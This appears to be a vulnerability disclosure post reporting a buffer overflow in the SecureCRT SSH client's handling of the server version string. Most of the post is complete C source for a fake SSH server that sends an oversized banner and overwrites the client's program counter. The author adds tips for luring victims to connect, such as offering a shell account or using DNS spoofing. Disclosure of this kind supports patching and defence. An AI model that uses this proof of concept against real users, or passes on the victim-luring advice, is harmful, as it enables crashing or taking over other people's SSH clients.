SecureCRT (http://www.vandyke.com/products/securecrt/) seems to have a bug in a 
seemlingly trivial portion of its SSH connection code. When an SSH Client 
connects to a server, the server sends a version string containing minor and 
major numbers for the protocol, as well as a server-specific identifier string 
which is specified to be no more than 40 bytes long. Unfortunetly the SecureCRT 
code which handles errors relating to an unsupported protocol version contains 
an unchecked buffer overflow when dealing with this identifier string. 

The following C code is given to reproduce this bug (yes I know Perl would have 
been shorter, sorry): 

#include <stdio.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 

#define PORT 9988 

int main(int argc, char **argv) { 
    int s, n, i, sz = sizeof(struct sockaddr_in); 
    struct sockaddr_in local, whatever; 
    char payload[510]; 

    strcpy(payload, "SSH-1.1-"); 
    for (i = 8; i < 508; i++) 
        payload[i] = 'A'; 
    payload[508] = '\n'; 
    payload[509] = '\0'; 

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) { 
        perror("socket"); 
        return 1; 
    } 
    local.sin_family = AF_INET; 
    local.sin_port = htons(PORT); 
    local.sin_addr.s_addr = INADDR_ANY; 
    memset(&(local.sin_zero), 0, 8); 
    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { 
        perror("bind"); 
        return 1; 
    } 
    if (listen(s, 2) == -1) { 
        perror("listen"); 
        return 1; 
    } 
    printf("waiting for connection...\n"); 
    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) { 
        perror("accept"); 
        return 1; 
    } 
    printf("client connected\n"); 
    if (send(n, payload, sizeof(payload) - 1, 0) == -1) { 
        perror("send"); 
        return 1; 
    } 
    printf("sent string: [%s]\n", payload); 
    close(n); 
    close(s); 
    return 0; 
} 

After starting the (fake) server, run the SecureCRT client, attach a debugger 
and connect. Notice the value of PC is now 0x41414141...coincidence? 

There are a number of ways to trick people into connecting to your ssh server, 
i.e. telling them you've given them an account on your shell, dns spoofing etc. 

    Big shout-out to Lagow, Biggie Smalls (up in heaven), 
    Gweeds, & the whole Mr. Mittens crew 

        - Kyuzo